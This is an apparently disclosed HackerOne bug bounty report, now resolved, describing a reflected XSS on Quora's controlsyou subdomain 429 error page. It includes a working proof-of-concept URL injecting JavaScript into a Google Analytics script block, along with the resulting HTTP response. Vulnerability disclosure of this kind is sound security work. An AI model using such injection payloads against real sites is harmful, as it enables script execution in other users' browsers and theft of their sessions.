[controlsyou.quora.com] 429 Too Many Requests Error-Page XSS

Disclosed: 2017-03-31 19:35:43 By bobrov To quora
Medium
Vulnerability Details
**Summary:** XSS on the error page when the user makes too many requests. ### Steps To Reproduce 1. Make a lot of requests to get the error 429 2. Open PoC in FireFox ``` https://controlsyou.quora.com/'-alert(document.domain)-' ``` **HTTP Response** ``` <script type="text/javascript"> ... ga('set', 'dimension1', 'board-'-alert(document.domain)-''); ga('set', 'dimension2', 'False'); ga('set', 'dimension3', 'False');});});</script> ``` ### Optional: Your Environment (Browser version, Device, app version, os version etc) Tested on FireFox 50.0.2
Actions
View on HackerOne
Report Stats
  • Report ID: 189768
  • State: Closed
  • Substate: resolved
  • Upvotes: 17
Share this report